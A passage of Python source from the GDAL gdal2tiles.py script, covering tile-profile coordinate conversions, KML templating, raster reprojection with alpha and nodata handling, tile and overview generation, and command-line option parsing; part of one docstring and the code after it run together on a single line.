        "Returns tile for given mercator coordinates"
        px, py = self.MetersToPixels(mx, my, zoom)
        return self.PixelsToTile(px, py)

    def TileBounds(self, tx, ty, zoom):
        "Returns bounds of the given tile in EPSG:3857 coordinates"
        minx, miny = self.PixelsToMeters(tx * self.tile_size, ty * self.tile_size, zoom)
        maxx, maxy = self.PixelsToMeters((tx + 1) * self.tile_size, (ty + 1) * self.tile_size, zoom)
        return (minx, miny, maxx, maxy)

    def TileLatLonBounds(self, tx, ty, zoom):
        "Returns bounds of the given tile in latitude/longitude using WGS84 datum"
        bounds = self.TileBounds(tx, ty, zoom)
        minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1])
        maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3])

        return (minLat, minLon, maxLat, maxLon)

    def Resolution(self, zoom):
        "Resolution (meters/pixel) for given zoom level (measured at Equator)"
        # return (2 * math.pi * 6378137) / (self.tile_size * 2**zoom)
        return self.initialResolution / (2**zoom)

    def ZoomForPixelSize(self, pixelSize):
        "Maximal scaledown zoom of the pyramid closest to the pixelSize."
        for i in range(MAXZOOMLEVEL):
            if pixelSize > self.Resolution(i):
                return max(0, i - 1)  # We don't want to scale up
        return MAXZOOMLEVEL - 1

    def GoogleTile(self, tx, ty, zoom):
        "Converts TMS tile coordinates to Google Tile coordinates"
        # coordinate origin is moved from bottom-left to top-left corner of the extent
        return tx, (2**zoom - 1) - ty

    def QuadTree(self, tx, ty, zoom):
        "Converts TMS tile coordinates to Microsoft QuadTree"
        quadKey = ""
        # Flip to top-left origin, then emit one base-4 digit per zoom level.
        ty = (2**zoom - 1) - ty
        for i in range(zoom, 0, -1):
            digit = 0
            mask = 1 << (i - 1)
            if (tx & mask) != 0:
                digit += 1
            if (ty & mask) != 0:
                digit += 2
            quadKey += str(digit)

        return quadKey


class GlobalGeodetic(object):
    r"""
    TMS Global Geodetic Profile
    ---------------------------

    Functions necessary for generation of global tiles in Plate Carre projection,
    EPSG:4326, "unprojected profile".

    Such tiles are compatible with Google Earth (as any other EPSG:4326 rasters)
    and you can overlay the tiles on top of OpenLayers base map.

    Pixel and tile coordinates are in TMS notation (origin [0,0] in bottom-left).

    What coordinate conversions do we need for TMS Global Geodetic tiles?

      Global Geodetic tiles are using geodetic coordinates (latitude,longitude)
      directly as planar coordinates XY (it is also called Unprojected or Plate
      Carre). We need only scaling to pixel pyramid and cutting to tiles.
      Pyramid has on top level two tiles, so it is not square but rectangle.
      Area [-180,-90,180,90] is scaled to 512x256 pixels.
      TMS has coordinate origin (for pixels and tiles) in bottom-left corner.
      Rasters are in EPSG:4326 and therefore are compatible with Google Earth.

         LatLon      <->      Pixels      <->     Tiles

     WGS84 coordinates   Pixels in pyramid  Tiles in pyramid
         lat/lon         XY pixels Z zoom      XYZ from TMS
        EPSG:4326
          .----.
---- / \ <-> /--------/ <-> TMS \ / /--------------/ ----- /--------------------/ WMS, KML Web Clients, Google Earth TileMapService """ def __init__(self, tmscompatible, tile_size=256): self.tile_size = tile_size if tmscompatible is not None: # Defaults the resolution factor to 0.703125 (2 tiles @ level 0) # Adhers to OSGeo TMS spec # http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification#global-geodetic self.resFact = 180.0 / self.tile_size else: # Defaults the resolution factor to 1.40625 (1 tile @ level 0) # Adheres OpenLayers, MapProxy, etc default resolution for WMTS self.resFact = 360.0 / self.tile_size def LonLatToPixels(self, lon, lat, zoom): "Converts lon/lat to pixel coordinates in given zoom of the EPSG:4326 pyramid" res = self.resFact / 2**zoom px = (180 + lon) / res py = (90 + lat) / res return px, py def PixelsToTile(self, px, py): "Returns coordinates of the tile covering region in pixel coordinates" tx = int(math.ceil(px / float(self.tile_size)) - 1) ty = int(math.ceil(py / float(self.tile_size)) - 1) return tx, ty def LonLatToTile(self, lon, lat, zoom): "Returns the tile for zoom which covers given lon/lat coordinates" px, py = self.LonLatToPixels(lon, lat, zoom) return self.PixelsToTile(px, py) def Resolution(self, zoom): "Resolution (arc/pixel) for given zoom level (measured at Equator)" return self.resFact / 2**zoom def ZoomForPixelSize(self, pixelSize): "Maximal scaledown zoom of the pyramid closest to the pixelSize." 
for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): return max(0, i - 1) # We don't want to scale up return MAXZOOMLEVEL - 1 def TileBounds(self, tx, ty, zoom): "Returns bounds of the given tile" res = self.resFact / 2**zoom return ( tx * self.tile_size * res - 180, ty * self.tile_size * res - 90, (tx + 1) * self.tile_size * res - 180, (ty + 1) * self.tile_size * res - 90 ) def TileLatLonBounds(self, tx, ty, zoom): "Returns bounds of the given tile in the SWNE form" b = self.TileBounds(tx, ty, zoom) return (b[1], b[0], b[3], b[2]) class Zoomify(object): """ Tiles compatible with the Zoomify viewer ---------------------------------------- """ def __init__(self, width, height, tile_size=256, tileformat='jpg'): """Initialization of the Zoomify tile tree""" self.tile_size = tile_size self.tileformat = tileformat imagesize = (width, height) tiles = (math.ceil(width / tile_size), math.ceil(height / tile_size)) # Size (in tiles) for each tier of pyramid. self.tierSizeInTiles = [] self.tierSizeInTiles.append(tiles) # Image size in pixels for each pyramid tierself self.tierImageSize = [] self.tierImageSize.append(imagesize) while (imagesize[0] > tile_size or imagesize[1] > tile_size): imagesize = (math.floor(imagesize[0] / 2), math.floor(imagesize[1] / 2)) tiles = (math.ceil(imagesize[0] / tile_size), math.ceil(imagesize[1] / tile_size)) self.tierSizeInTiles.append(tiles) self.tierImageSize.append(imagesize) self.tierSizeInTiles.reverse() self.tierImageSize.reverse() # Depth of the Zoomify pyramid, number of tiers (zoom levels) self.numberOfTiers = len(self.tierSizeInTiles) # Number of tiles up to the given tier of pyramid. 
self.tileCountUpToTier = [] self.tileCountUpToTier[0] = 0 for i in range(1, self.numberOfTiers + 1): self.tileCountUpToTier.append( self.tierSizeInTiles[i - 1][0] * self.tierSizeInTiles[i - 1][1] + self.tileCountUpToTier[i - 1] ) def tilefilename(self, x, y, z): """Returns filename for tile with given coordinates""" tileIndex = x + y * self.tierSizeInTiles[z][0] + self.tileCountUpToTier[z] return os.path.join("TileGroup%.0f" % math.floor(tileIndex / 256), "%s-%s-%s.%s" % (z, x, y, self.tileformat)) class GDALError(Exception): pass def exit_with_error(message, details=""): # Message printing and exit code kept from the way it worked using the OptionParser (in case # someone parses the error output) sys.stderr.write("Usage: gdal2tiles.py [options] input_file [output]\n\n") sys.stderr.write("gdal2tiles.py: error: %s\n" % message) if details: sys.stderr.write("\n\n%s\n" % details) sys.exit(2) def generate_kml(tx, ty, tz, tileext, tile_size, tileswne, options, children=None, **args): """ Template for the KML. Returns filled string. 
""" if not children: children = [] args['tx'], args['ty'], args['tz'] = tx, ty, tz args['tileformat'] = tileext if 'tile_size' not in args: args['tile_size'] = tile_size if 'minlodpixels' not in args: args['minlodpixels'] = int(args['tile_size'] / 2) if 'maxlodpixels' not in args: args['maxlodpixels'] = int(args['tile_size'] * 8) if children == []: args['maxlodpixels'] = -1 if tx is None: tilekml = False args['title'] = options.title else: tilekml = True args['title'] = "%d/%d/%d.kml" % (tz, tx, ty) args['south'], args['west'], args['north'], args['east'] = tileswne(tx, ty, tz) if tx == 0: args['drawOrder'] = 2 * tz + 1 elif tx is not None: args['drawOrder'] = 2 * tz else: args['drawOrder'] = 0 url = options.url if not url: if tilekml: url = "../../" else: url = "" s = """<?xml version="1.0" encoding="utf-8"?> <kml xmlns="http://www.opengis.net/kml/2.2"> <Document> <name>%(title)s</name> <description></description> <Style> <ListStyle id="hideChildren"> <listItemType>checkHideChildren</listItemType> </ListStyle> </Style>""" % args if tilekml: s += """ <Region> <LatLonAltBox> <north>%(north).14f</north> <south>%(south).14f</south> <east>%(east).14f</east> <west>%(west).14f</west> </LatLonAltBox> <Lod> <minLodPixels>%(minlodpixels)d</minLodPixels> <maxLodPixels>%(maxlodpixels)d</maxLodPixels> </Lod> </Region> <GroundOverlay> <drawOrder>%(drawOrder)d</drawOrder> <Icon> <href>%(ty)d.%(tileformat)s</href> </Icon> <LatLonBox> <north>%(north).14f</north> <south>%(south).14f</south> <east>%(east).14f</east> <west>%(west).14f</west> </LatLonBox> </GroundOverlay> """ % args for cx, cy, cz in children: csouth, cwest, cnorth, ceast = tileswne(cx, cy, cz) s += """ <NetworkLink> <name>%d/%d/%d.%s</name> <Region> <LatLonAltBox> <north>%.14f</north> <south>%.14f</south> <east>%.14f</east> <west>%.14f</west> </LatLonAltBox> <Lod> <minLodPixels>%d</minLodPixels> <maxLodPixels>-1</maxLodPixels> </Lod> </Region> <Link> <href>%s%d/%d/%d.kml</href> 
<viewRefreshMode>onRegion</viewRefreshMode> <viewFormat/> </Link> </NetworkLink> """ % (cz, cx, cy, args['tileformat'], cnorth, csouth, ceast, cwest, args['minlodpixels'], url, cz, cx, cy) s += """ </Document> </kml> """ return s def scale_query_to_tile(dsquery, dstile, tiledriver, options, tilefilename=''): """Scales down query dataset to the tile dataset""" querysize = dsquery.RasterXSize tile_size = dstile.RasterXSize tilebands = dstile.RasterCount if options.resampling == 'average': # Function: gdal.RegenerateOverview() for i in range(1, tilebands + 1): # Black border around NODATA res = gdal.RegenerateOverview(dsquery.GetRasterBand(i), dstile.GetRasterBand(i), 'average') if res != 0: exit_with_error("RegenerateOverview() failed on %s, error %d" % ( tilefilename, res)) elif options.resampling == 'antialias' and numpy_available: # Scaling by PIL (Python Imaging Library) - improved Lanczos array = numpy.zeros((querysize, querysize, tilebands), numpy.uint8) for i in range(tilebands): array[:, :, i] = gdalarray.BandReadAsArray(dsquery.GetRasterBand(i + 1), 0, 0, querysize, querysize) im = Image.fromarray(array, 'RGBA') # Always four bands im1 = im.resize((tile_size, tile_size), Image.ANTIALIAS) if os.path.exists(tilefilename): im0 = Image.open(tilefilename) im1 = Image.composite(im1, im0, im1) im1.save(tilefilename, tiledriver) else: if options.resampling == 'near': gdal_resampling = gdal.GRA_NearestNeighbour elif options.resampling == 'bilinear': gdal_resampling = gdal.GRA_Bilinear elif options.resampling == 'cubic': gdal_resampling = gdal.GRA_Cubic elif options.resampling == 'cubicspline': gdal_resampling = gdal.GRA_CubicSpline elif options.resampling == 'lanczos': gdal_resampling = gdal.GRA_Lanczos # Other algorithms are implemented by gdal.ReprojectImage(). 
dsquery.SetGeoTransform((0.0, tile_size / float(querysize), 0.0, 0.0, 0.0, tile_size / float(querysize))) dstile.SetGeoTransform((0.0, 1.0, 0.0, 0.0, 0.0, 1.0)) res = gdal.ReprojectImage(dsquery, dstile, None, None, gdal_resampling) if res != 0: exit_with_error("ReprojectImage() failed on %s, error %d" % (tilefilename, res)) def setup_no_data_values(input_dataset, options): """ Extract the NODATA values from the dataset or use the passed arguments as override if any """ in_nodata = [] if options.srcnodata: nds = list(map(float, options.srcnodata.split(','))) if len(nds) < input_dataset.RasterCount: in_nodata = (nds * input_dataset.RasterCount)[:input_dataset.RasterCount] else: in_nodata = nds else: for i in range(1, input_dataset.RasterCount + 1): raster_no_data = input_dataset.GetRasterBand(i).GetNoDataValue() if raster_no_data is not None: in_nodata.append(raster_no_data) if options.verbose: print("NODATA: %s" % in_nodata) return in_nodata def setup_input_srs(input_dataset, options): """ Determines and returns the Input Spatial Reference System (SRS) as an osr object and as a WKT representation Uses in priority the one passed in the command line arguments. 
If None, tries to extract them from the input dataset """ input_srs = None input_srs_wkt = None if options.s_srs: input_srs = osr.SpatialReference() input_srs.SetFromUserInput(options.s_srs) input_srs_wkt = input_srs.ExportToWkt() else: input_srs_wkt = input_dataset.GetProjection() if not input_srs_wkt and input_dataset.GetGCPCount() != 0: input_srs_wkt = input_dataset.GetGCPProjection() if input_srs_wkt: input_srs = osr.SpatialReference() input_srs.ImportFromWkt(input_srs_wkt) return input_srs, input_srs_wkt def setup_output_srs(input_srs, options): """ Setup the desired SRS (based on options) """ output_srs = osr.SpatialReference() if options.profile == 'mercator': output_srs.ImportFromEPSG(3857) elif options.profile == 'geodetic': output_srs.ImportFromEPSG(4326) else: output_srs = input_srs return output_srs def has_georeference(dataset): return (dataset.GetGeoTransform() != (0.0, 1.0, 0.0, 0.0, 0.0, 1.0) or dataset.GetGCPCount() != 0) def reproject_dataset(from_dataset, from_srs, to_srs, options=None): """ Returns the input dataset in the expected "destination" SRS. 
def reproject_dataset(from_dataset, from_srs, to_srs, options=None):
    """Return *from_dataset* warped into *to_srs*.

    Datasets that already match the target SRS (and carry no GCPs) are
    handed back untouched.  Raises GDALError when either SRS is missing.
    """
    if not from_srs or not to_srs:
        raise GDALError("from and to SRS must be defined to reproject the dataset")

    needs_warp = ((from_srs.ExportToProj4() != to_srs.ExportToProj4()) or
                  (from_dataset.GetGCPCount() != 0))
    if not needs_warp:
        return from_dataset

    warped = gdal.AutoCreateWarpedVRT(from_dataset,
                                      from_srs.ExportToWkt(),
                                      to_srs.ExportToWkt())
    if options and options.verbose:
        print("Warping of the raster by AutoCreateWarpedVRT (result saved into 'tiles.vrt')")
        warped.GetDriver().CreateCopy("tiles.vrt", warped)
    return warped


def add_gdal_warp_options_to_string(vrt_string, warp_options):
    """Insert ``<Option name="...">value</Option>`` entries into the
    GDALWarpOptions section of a VRT document given as a string.

    Returns the document unchanged when *warp_options* is empty or the
    document has no GDALWarpOptions element.
    """
    if not warp_options:
        return vrt_string

    root = ElementTree.fromstring(vrt_string)
    warp_section = root.find("GDALWarpOptions")
    if warp_section is None:
        return vrt_string

    for name, value in warp_options.items():
        builder = ElementTree.TreeBuilder()
        builder.start("Option", {"name": name})
        builder.data(value)
        builder.end("Option")
        warp_section.insert(0, builder.close())

    return ElementTree.tostring(root).decode()
def update_no_data_values(warped_vrt_dataset, nodata_values, options=None):
    """Force *nodata_values* onto a warped VRT dataset.

    Rewrites the in-memory VRT XML with INIT_DEST/UNIFIED_SRC_NODATA warp
    options, reopens it and records the values in a NODATA_VALUES metadata
    item.  Returns the reopened dataset.
    """
    # TODO: gbataille - Seems that I forgot tests there
    assert nodata_values != []

    vrt_text = warped_vrt_dataset.GetMetadata("xml:VRT")[0]
    vrt_text = add_gdal_warp_options_to_string(
        vrt_text, {"INIT_DEST": "NO_DATA", "UNIFIED_SRC_NODATA": "YES"})

    corrected_dataset = gdal.Open(vrt_text)

    # Record the forced values so later consumers can read them back.
    corrected_dataset.SetMetadataItem(
        'NODATA_VALUES', ' '.join([str(i) for i in nodata_values]))

    if options and options.verbose:
        print("Modified warping result saved into 'tiles1.vrt'")
        with open("tiles1.vrt", "w") as f:
            f.write(corrected_dataset.GetMetadata("xml:VRT")[0])

    return corrected_dataset


def add_alpha_band_to_string_vrt(vrt_string):
    """Append an Alpha band definition (plus matching warp options) to a
    warped-VRT document given as a string.

    Equivalent to ``gdalwarp -dstalpha``.  Raises when the document already
    contains an Alpha band.
    """
    root = ElementTree.fromstring(vrt_string)

    # Count the existing raster bands and locate the insertion point: the
    # position right after the last VRTRasterBand element.
    insert_at = 0
    band_total = 0
    for child in list(root):
        if child.tag == "VRTRasterBand":
            band_total += 1
            color = child.find("./ColorInterp")
            if color is not None and color.text == "Alpha":
                raise Exception("Alpha band already present")
        elif band_total:
            # First element after the band definitions: stop here.
            break
        insert_at += 1

    alpha_number = str(band_total + 1)

    builder = ElementTree.TreeBuilder()
    builder.start("VRTRasterBand",
                  {'dataType': "Byte", "band": alpha_number,
                   "subClass": "VRTWarpedRasterBand"})
    builder.start("ColorInterp", {})
    builder.data("Alpha")
    builder.end("ColorInterp")
    builder.end("VRTRasterBand")
    root.insert(insert_at, builder.close())

    warp_options = root.find(".//GDALWarpOptions")

    builder = ElementTree.TreeBuilder()
    builder.start("DstAlphaBand", {})
    builder.data(alpha_number)
    builder.end("DstAlphaBand")
    warp_options.append(builder.close())

    # Make sure the destination alpha starts out fully transparent.
    builder = ElementTree.TreeBuilder()
    builder.start("Option", {"name": "INIT_DEST"})
    builder.data("0")
    builder.end("Option")
    warp_options.append(builder.close())

    return ElementTree.tostring(root).decode()
def update_alpha_value_for_non_alpha_inputs(warped_vrt_dataset, options=None):
    """Add an alpha band to 1- or 3-band datasets (inputs without an alpha
    channel), used when no NODATA value was forced through the options.

    Datasets with any other band count are returned untouched.
    """
    if warped_vrt_dataset.RasterCount not in [1, 3]:
        return warped_vrt_dataset

    vrt_text = warped_vrt_dataset.GetMetadata("xml:VRT")[0]
    vrt_text = add_alpha_band_to_string_vrt(vrt_text)
    warped_vrt_dataset = gdal.Open(vrt_text)

    if options and options.verbose:
        print("Modified -dstalpha warping result saved into 'tiles1.vrt'")
        with open("tiles1.vrt", "w") as f:
            f.write(warped_vrt_dataset.GetMetadata("xml:VRT")[0])

    return warped_vrt_dataset


def nb_data_bands(dataset):
    """Return the number of data (non-alpha) bands of a gdal dataset."""
    mask = dataset.GetRasterBand(1).GetMaskBand()
    has_alpha = mask.GetMaskFlags() & gdal.GMF_ALPHA
    # 2 and 4 bands conventionally mean gray+alpha / RGB+alpha even when the
    # mask flags do not say so explicitly.
    if has_alpha or dataset.RasterCount in (4, 2):
        return dataset.RasterCount - 1
    return dataset.RasterCount
def create_base_tile(tile_job_info, tile_detail, queue=None):
    """Render one base (max-zoom) tile described by *tile_detail*.

    Reads the raster and alpha windows from the source file named in
    *tile_job_info*, writes the tile image to disk (plus its KML when
    requested) and optionally reports completion through *queue*.
    The opened source dataset is cached in ``threadLocal`` and reused
    across calls on the same thread.
    """
    dataBandsCount = tile_job_info.nb_data_bands
    output = tile_job_info.output_file_path
    tileext = tile_job_info.tile_extension
    tile_size = tile_job_info.tile_size
    options = tile_job_info.options

    # One extra band for alpha on top of the data bands.
    tilebands = dataBandsCount + 1

    # Reuse the dataset opened by a previous call on this thread, if any.
    cached_ds = getattr(threadLocal, 'cached_ds', None)
    if cached_ds and cached_ds.GetDescription() == tile_job_info.src_file:
        ds = cached_ds
    else:
        ds = gdal.Open(tile_job_info.src_file, gdal.GA_ReadOnly)
        threadLocal.cached_ds = ds

    mem_drv = gdal.GetDriverByName('MEM')
    out_drv = gdal.GetDriverByName(tile_job_info.tile_driver)
    alphaband = ds.GetRasterBand(1).GetMaskBand()

    # Tile coordinates (t*), raster read window (r*) and the window inside
    # the tile where the pixels land (w*), all precomputed by the caller.
    tx = tile_detail.tx
    ty = tile_detail.ty
    tz = tile_detail.tz
    rx = tile_detail.rx
    ry = tile_detail.ry
    rxsize = tile_detail.rxsize
    rysize = tile_detail.rysize
    wx = tile_detail.wx
    wy = tile_detail.wy
    wxsize = tile_detail.wxsize
    wysize = tile_detail.wysize
    querysize = tile_detail.querysize

    # Tile dataset in memory
    tilefilename = os.path.join(
        output, str(tz), str(tx), "%s.%s" % (ty, tileext))
    dstile = mem_drv.Create('', tile_size, tile_size, tilebands)

    data = alpha = None

    if options.verbose:
        print("\tReadRaster Extent: ",
              (rx, ry, rxsize, rysize), (wx, wy, wxsize, wysize))

    # Query is in 'nearest neighbour' but can be bigger in then the tile_size
    # We scale down the query to the tile_size by supplied algorithm.

    if rxsize != 0 and rysize != 0 and wxsize != 0 and wysize != 0:
        alpha = alphaband.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize)

        # Detect totally transparent tile and skip its creation
        if tile_job_info.exclude_transparent and len(alpha) == alpha.count('\x00'.encode('ascii')):
            return

        data = ds.ReadRaster(rx, ry, rxsize, rysize, wxsize, wysize,
                             band_list=list(range(1, dataBandsCount + 1)))

    # The tile in memory is a transparent file by default. Write pixel values into it if
    # any
    if data:
        if tile_size == querysize:
            # Use the ReadRaster result directly in tiles ('nearest neighbour' query)
            dstile.WriteRaster(wx, wy, wxsize, wysize, data,
                               band_list=list(range(1, dataBandsCount + 1)))
            dstile.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])

            # Note: For source drivers based on WaveLet compression (JPEG2000, ECW,
            # MrSID) the ReadRaster function returns high-quality raster (not ugly
            # nearest neighbour)
            # TODO: Use directly 'near' for WaveLet files
        else:
            # Big ReadRaster query in memory scaled to the tile_size - all but 'near'
            # algo
            dsquery = mem_drv.Create('', querysize, querysize, tilebands)
            # TODO: fill the null value in case a tile without alpha is produced (now
            # only png tiles are supported)
            dsquery.WriteRaster(wx, wy, wxsize, wysize, data,
                                band_list=list(range(1, dataBandsCount + 1)))
            dsquery.WriteRaster(wx, wy, wxsize, wysize, alpha, band_list=[tilebands])

            scale_query_to_tile(dsquery, dstile, tile_job_info.tile_driver, options,
                                tilefilename=tilefilename)
            del dsquery

    del data

    if options.resampling != 'antialias':
        # Write a copy of tile to png/jpg
        out_drv.CreateCopy(tilefilename, dstile, strict=0)

    del dstile

    # Create a KML file for this tile.
    if tile_job_info.kml:
        kmlfilename = os.path.join(output, str(tz), str(tx), '%d.kml' % ty)
        if not options.resume or not os.path.exists(kmlfilename):
            with open(kmlfilename, 'wb') as f:
                f.write(generate_kml(
                    tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
                    get_tile_swne(tile_job_info, options), tile_job_info.options
                ).encode('utf-8'))

    if queue:
        queue.put("tile %s %s %s" % (tx, ty, tz))
def create_overview_tiles(tile_job_info, output_folder, options):
    """Generation of the overview tiles (higher in the pyramid) based on existing tiles

    Walks zoom levels from tmaxz-1 down to tminz; each overview tile is
    composed from up to four already-written tiles of the level below,
    scaled down to one tile.
    """
    mem_driver = gdal.GetDriverByName('MEM')
    tile_driver = tile_job_info.tile_driver
    out_driver = gdal.GetDriverByName(tile_driver)

    # One extra band for alpha on top of the data bands.
    tilebands = tile_job_info.nb_data_bands + 1

    # Usage of existing tiles: from 4 underlying tiles generate one as overview.

    # Total number of overview tiles, for the progress bar.
    tcount = 0
    for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
        tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
        tcount += (1 + abs(tmaxx - tminx)) * (1 + abs(tmaxy - tminy))

    ti = 0

    if tcount == 0:
        return

    if not options.quiet:
        print("Generating Overview Tiles:")

    progress_bar = ProgressBar(tcount)
    progress_bar.start()

    for tz in range(tile_job_info.tmaxz - 1, tile_job_info.tminz - 1, -1):
        tminx, tminy, tmaxx, tmaxy = tile_job_info.tminmax[tz]
        for ty in range(tmaxy, tminy - 1, -1):
            for tx in range(tminx, tmaxx + 1):

                ti += 1
                tilefilename = os.path.join(output_folder,
                                            str(tz),
                                            str(tx),
                                            "%s.%s" % (ty, tile_job_info.tile_extension))

                if options.verbose:
                    print(ti, '/', tcount, tilefilename)

                if options.resume and os.path.exists(tilefilename):
                    if options.verbose:
                        print("Tile generation skipped because of --resume")
                    else:
                        # Progress is only ticked in non-verbose mode here.
                        progress_bar.log_progress()
                    continue

                # Create directories for the tile
                if not os.path.exists(os.path.dirname(tilefilename)):
                    os.makedirs(os.path.dirname(tilefilename))

                # Query canvas is 2x2 underlying tiles; dstile is the result.
                dsquery = mem_driver.Create('', 2 * tile_job_info.tile_size,
                                            2 * tile_job_info.tile_size, tilebands)
                # TODO: fill the null value
                dstile = mem_driver.Create('', tile_job_info.tile_size, tile_job_info.tile_size,
                                           tilebands)

                # TODO: Implement more clever walking on the tiles with cache functionality
                # probably walk should start with reading of four tiles from top left corner
                # Hilbert curve

                children = []
                # Read the tiles and write them to query window
                for y in range(2 * ty, 2 * ty + 2):
                    for x in range(2 * tx, 2 * tx + 2):
                        minx, miny, maxx, maxy = tile_job_info.tminmax[tz + 1]
                        if x >= minx and x <= maxx and y >= miny and y <= maxy:
                            base_tile_path = os.path.join(output_folder, str(tz + 1), str(x),
                                                          "%s.%s" % (y, tile_job_info.tile_extension))
                            if not os.path.isfile(base_tile_path):
                                continue

                            dsquerytile = gdal.Open(base_tile_path, gdal.GA_ReadOnly)

                            # NOTE(review): the modulo arithmetic below selects the
                            # top/bottom and left/right half of the 2x2 canvas for
                            # the child tile (x, y) of (tx, ty); the ty==0/tx==0
                            # special cases avoid division by zero — confirm
                            # against upstream gdal2tiles before touching.
                            if (ty == 0 and y == 1) or (ty != 0 and (y % (2 * ty)) != 0):
                                tileposy = 0
                            else:
                                tileposy = tile_job_info.tile_size

                            if tx:
                                tileposx = x % (2 * tx) * tile_job_info.tile_size
                            elif tx == 0 and x == 1:
                                tileposx = tile_job_info.tile_size
                            else:
                                tileposx = 0

                            dsquery.WriteRaster(
                                tileposx, tileposy, tile_job_info.tile_size,
                                tile_job_info.tile_size,
                                dsquerytile.ReadRaster(0, 0,
                                                       tile_job_info.tile_size,
                                                       tile_job_info.tile_size),
                                band_list=list(range(1, tilebands + 1)))

                            children.append([x, y, tz + 1])

                if children:
                    scale_query_to_tile(dsquery, dstile, tile_driver, options,
                                        tilefilename=tilefilename)
                    # Write a copy of tile to png/jpg
                    if options.resampling != 'antialias':
                        # Write a copy of tile to png/jpg
                        out_driver.CreateCopy(tilefilename, dstile, strict=0)

                    if options.verbose:
                        print("\tbuild from zoom", tz + 1,
                              " tiles:", (2 * tx, 2 * ty), (2 * tx + 1, 2 * ty),
                              (2 * tx, 2 * ty + 1), (2 * tx + 1, 2 * ty + 1))

                    # Create a KML file for this tile.
                    if tile_job_info.kml:
                        with open(os.path.join(
                            output_folder,
                            '%d/%d/%d.kml' % (tz, tx, ty)
                        ), 'wb') as f:
                            f.write(generate_kml(
                                tx, ty, tz, tile_job_info.tile_extension, tile_job_info.tile_size,
                                get_tile_swne(tile_job_info, options), options, children
                            ).encode('utf-8'))

                if not options.verbose and not options.quiet:
                    progress_bar.log_progress()
def optparse_init():
    """Prepare the option parser for input (argv).

    Returns a configured ``optparse.OptionParser`` with all gdal2tiles
    options, the KML and web-viewer option groups, and the defaults set.
    """
    from optparse import OptionParser, OptionGroup

    usage = "Usage: %prog [options] input_file [output]"
    p = OptionParser(usage, version="%prog " + __version__)
    p.add_option("-p", "--profile", dest='profile',
                 type='choice', choices=profile_list,
                 help=("Tile cutting profile (%s) - default 'mercator' "
                       "(Google Maps compatible)" % ",".join(profile_list)))
    p.add_option("-r", "--resampling", dest="resampling",
                 type='choice', choices=resampling_list,
                 help="Resampling method (%s) - default 'average'" % ",".join(resampling_list))
    p.add_option('-s', '--s_srs', dest="s_srs", metavar="SRS",
                 help="The spatial reference system used for the source input data")
    p.add_option('-z', '--zoom', dest="zoom",
                 help="Zoom levels to render (format:'2-5' or '10').")
    p.add_option('-e', '--resume', dest="resume", action="store_true",
                 help="Resume mode. Generate only missing files.")
    p.add_option('-a', '--srcnodata', dest="srcnodata", metavar="NODATA",
                 help="NODATA transparency value to assign to the input data")
    p.add_option('-d', '--tmscompatible', dest="tmscompatible", action="store_true",
                 help=("When using the geodetic profile, specifies the base resolution "
                       "as 0.703125 or 2 tiles at zoom level 0."))
    p.add_option("-v", "--verbose",
                 action="store_true", dest="verbose",
                 help="Print status messages to stdout")
    p.add_option("-x", "--exclude",
                 action="store_true", dest="exclude_transparent",
                 help="Exclude transparent tiles from result tileset")
    p.add_option("-q", "--quiet",
                 action="store_true", dest="quiet",
                 help="Disable messages and status to stdout")
    p.add_option("--processes",
                 dest="nb_processes",
                 type='int',
                 help="Number of processes to use for tiling")

    # KML options
    g = OptionGroup(p, "KML (Google Earth) options",
                    "Options for generated Google Earth SuperOverlay metadata")
    g.add_option("-k", "--force-kml", dest='kml', action="store_true",
                 help=("Generate KML for Google Earth - default for 'geodetic' profile and "
                       "'raster' in EPSG:4326. For a dataset with different projection use "
                       "with caution!"))
    g.add_option("-n", "--no-kml", dest='kml', action="store_false",
                 help="Avoid automatic generation of KML files for EPSG:4326")
    g.add_option("-u", "--url", dest='url',
                 help="URL address where the generated tiles are going to be published")
    p.add_option_group(g)

    # HTML options
    g = OptionGroup(p, "Web viewer options",
                    "Options for generated HTML viewers a la Google Maps")
    g.add_option("-w", "--webviewer", dest='webviewer', type='choice', choices=webviewer_list,
                 help="Web viewer to generate (%s) - default 'all'" % ",".join(webviewer_list))
    g.add_option("-t", "--title", dest='title',
                 help="Title of the map")
    g.add_option("-c", "--copyright", dest='copyright',
                 help="Copyright for the map")
    g.add_option("-g", "--googlekey", dest='googlekey',
                 help="Google Maps API key from http://code.google.com/apis/maps/signup.html")
    g.add_option("-b", "--bingkey", dest='bingkey',
                 help="Bing Maps API key from https://www.bingmapsportal.com/")
    p.add_option_group(g)

    # BUG FIX: the default used to be registered under the key 'processes',
    # but the --processes option stores into dest='nb_processes', so
    # options.nb_processes silently defaulted to None instead of 1.
    # set_defaults() keys must match the option's dest.
    p.set_defaults(verbose=False, profile="mercator", kml=False, url='',
                   webviewer='all', copyright='', resampling='average', resume=False,
                   googlekey='INSERT_YOUR_KEY_HERE', bingkey='INSERT_YOUR_KEY_HERE',
                   nb_processes=1)

    return p
def process_args(argv):
    """Parse *argv*, validate the positional arguments and return the
    ``(input_file, output_folder, options)`` triple used by the tiler."""
    parser = optparse_init()
    options, positional = parser.parse_args(args=argv)

    # Exactly one input file is accepted, optionally followed by an
    # output folder.
    nb_args = len(positional)
    if nb_args == 0:
        exit_with_error("You need to specify at least an input file as argument to the script")
    if nb_args > 2:
        exit_with_error("Processing of several input files is not supported.",
                        "Please first use a tool like gdal_vrtmerge.py or gdal_merge.py on the "
                        "files: gdal_vrtmerge.py -o merged.vrt %s" % " ".join(positional))

    input_file = positional[0]
    if not os.path.isfile(input_file):
        exit_with_error("The provided input file %s does not exist or is not a file" % input_file)

    if nb_args == 2:
        output_folder = positional[1]
    else:
        # Default output: a folder named after the input file (extension
        # stripped), created in the current directory.
        output_folder = os.path.splitext(os.path.basename(input_file))[0]

    options = options_post_processing(options, input_file, output_folder)

    return input_file, output_folder, options
def options_post_processing(options, input_file, output_folder):
    """Normalise the parsed options (title, publication URL), validate the
    resampling choice, warn about non-UTF-8 locales with non-ascii input
    names, and echo the configuration in verbose mode.  Returns *options*.
    """
    if not options.title:
        options.title = os.path.basename(input_file)

    # Make the publication URL end with '/<output basename>/'.
    if options.url:
